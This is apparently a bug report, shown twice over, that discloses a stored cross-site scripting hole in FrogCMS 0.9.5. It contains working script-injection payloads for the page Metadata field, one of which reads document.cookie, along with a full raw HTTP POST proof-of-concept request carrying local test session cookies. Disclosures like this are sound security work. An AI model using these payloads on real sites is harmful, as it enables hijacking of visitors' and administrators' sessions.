I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
pages-->Edit Page-->Metadata
payload: "/><script>confirm(1234)</script>
i think you can see the following picture to konw more.
Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
If people read our articles, we can easily get their cookie.
payload:"/><script>confirm(document.cookie)</script>
Affected Version:
0.9.5
The text was updated successfully, but these errors were encountered:
I have found a stored Cross Site Scripting Vulnerability.


log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
pages-->Edit Page-->Metadata
payload: "/><script>confirm(1234)</script>
i think you can see the following picture to konw more.
POC:
POST /test/FrogCMS-master/admin/?/page/edit/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/page/edit/3
Content-Type: application/x-www-form-urlencoded
Content-Length: 675
Cookie: current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e
Connection: keep-alive
Upgrade-Insecure-Requests: 1
page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close
when we published the article and we can see it from homepage.


URL:http://127.0.0.1/test/FrogCMS-master/
Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
If people read our articles, we can easily get their cookie.
payload:"/><script>confirm(document.cookie)</script>
Affected Version:
0.9.5
The text was updated successfully, but these errors were encountered: